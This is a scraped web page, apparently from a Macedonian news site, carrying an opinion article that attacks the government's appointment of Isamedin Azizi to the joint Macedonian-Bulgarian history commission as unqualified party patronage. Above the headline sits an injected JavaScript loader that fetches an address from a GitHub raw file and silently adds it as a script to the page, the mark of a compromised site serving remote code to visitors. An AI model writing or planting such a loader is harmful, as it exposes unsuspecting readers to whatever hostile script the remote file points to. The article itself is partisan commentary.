;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); По кои критериуми Исамедин Азизи е избран за член на Комисијата за историски прашања со Бугарија? - Антропол
АктуелноЛокално

По кои критериуми Исамедин Азизи е избран за член на Комисијата за историски прашања со Бугарија?

Владата на чело со Зоран Заев и СДСМ продолжува со погубните кадровски решенија кои се носат – не врз некаков план, програм или пак поставена државна цел – туку истите се резултат единствено на партиските пазарења помеѓу коалиционите партнери во власта. Ваквата состојба е карактеристична за скоро секое поле од државната управа, било тоа да е на локално или централно ниво.

Судејќи според резултатите, се чини дека надворешната политика е поле кое највеќе страда од безкрупулозната кадровска политика на владата. Пред скоро Исамедин Азизи е именуван за нов член во заедничката мултидисциплинарна експертска Комисија за историски и образовани прашања меѓу Македонија и Бугарија. Прашање е како во Влада дојдоа до идејата за Исамедин Азизи да да биде именуван во македонско-бугарската Комисија. Притоа, тука ние не ја доведуваме во прашање етничката припадност на Исамедин Азизи, туку се прашуваме, според кои критериуми и на кој начин токму тој е соодветен кадар за да биде дел во истата. Дали воопшто има потреба нови членови во комисијата и доколку има, која е потребата? 

Додека Република Бугарија во својата комисија назначува членови кои се познати по своите биографии во Европската, па дури и светската исторографија, ние именуваме анонимуси чии ставови по однос на прашањата за кои заседава Комисијата јавноста немала шанса никогаш да ги слушне! Во достапната биографија на Азизи, пишува дека истиот магистрирал на универзитет “Св. Кирил и Методиј“ – Скопје, Институт за национална историја на тема “Albancite na Balkanot 1912-1920“. Додека Азизи докторирал на тема “Односите меѓу Албанија и Кралството на СХС/Југославија 1918-1939“.

Во прилог е биографијата на Исамедин, од каде може да се види колку тој е соодветен за член на Комисијата, а може и да се претпостави колку истиот е стручно подготвен. Ваквата несериозност во пристапот на Владата, особено по однос на вакви сензитивни и многу важни прашања само може да ја влоши репутацијата на нашиот тим од Комисијата и да ја потврди нашата инфериорност како држава.